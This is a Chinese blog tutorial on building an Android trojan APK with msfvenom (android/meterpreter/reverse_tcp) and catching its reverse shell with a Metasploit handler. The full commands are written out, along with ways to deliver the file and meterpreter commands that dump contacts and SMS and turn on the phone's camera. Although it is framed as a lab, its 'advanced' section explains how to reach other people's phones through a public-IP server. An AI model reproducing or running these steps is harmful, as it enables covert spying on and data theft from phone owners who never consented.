Msfvenom是Metasploit独立的有效载荷生成器,也是msf有效载荷和msphencode的替代品。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode,常用于生成木马,在目标机器上执行,在本地机器kali中上线

实验目的

用msfvenom生成一个安卓手机下可执行木马akp的文件,用kali监听,实现控制安卓手机

实验环境

  • 攻击机:kali linux(192.168.72.133)
  • 靶机:安卓手机(雷电模拟器)
  • 工具:Metasploit和msfvenom
  • 环境:同一局域网

查看所有--payload的模块

msfvenom -l payloads

首先使用msfvenom生成一个可以被安卓执行的apk木马文件

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.72.133 LPORT=6666 R > qyyx.apk
  • 192.168.72.133是kali的IP地址
  • 6666是选择kali监听的端口
  • qyyx.apk是生成apk文件
# 启动metasploit渗透框架
msfconsole

# 使用侦听模块
use exploit/multi/handler

# 加载payload攻击模块
set payload android/meterpreter/reverse_tcp

# 设置kali的ip
set LHOST 192.168.72.133

# 设置kali的端口
set LPORT 6666
# 查看参数设置
show options

# 开始监听
run

接下来就可以把qyyx.apk木马文件发送给手机了
只要手机安装并且运行,shell就会反弹到kali中

怎么将kali生成的apk拿出来?有两个方法

  • 第一个方法是启动kali的apache
    systemctl start apache2
    把apk文件放到/var/www/html/目录下,雷电模拟器中访问kali的ip加文件名字
    192.168.72.133/qyyx.apk就可以下载了
  • 第二个方法是打开kali自带的火狐浏览器上传到网盘中

在雷电模拟器安装后点击一下(不会有任何反应的)

而kali这边已经显示成功了,因为模拟器没有摄像头 通讯录等等,只能获取手机信息

可输入的命令有(获取到的文件都在kali的root目录下)

sysinfo  //查看手机信息

webcam_list  //查看手机有多少个摄像头

webcam_stream  //开启实时摄像头

webcam_snap  //拍照片

dump_contacts  //导出电话号码

dump_sms  //导出信息

进阶玩法

我们把木马给其他人运行时发现kali这边没反应
因为生成木马用的是内网地址,不在同一网段,shell没法反弹
所以我们可以选择一个有公网IP的机器,让shell反弹给攻击机
有公网ip的机器可以是内网穿透节点,也可以是攻击机

之前写过内网穿透的教程了,现在就用服务器当攻击机演示
在centos7下安装Metasploit

yum install wget -y

wget https://rpm.metasploit.com/metasploit-omnibus/pkg/metasploit-framework-6.1.37%2B20220402102547~1rapid7-1.el6.x86_64.rpm

rpm -i metasploit-framework-6.1.37+20220402102547~1rapid7-1.el6.x86_64.rpm

安装之后,就从上面生成木马开始执行代码一路执行,不同的是监听ip,要换成服务器的公网ip

关于进阶玩法详细内容,请看Linux下安装nginx:https://blog.aerr.cn/1888.html

届ける言葉を今は育ててる
最后更新于 2022-04-04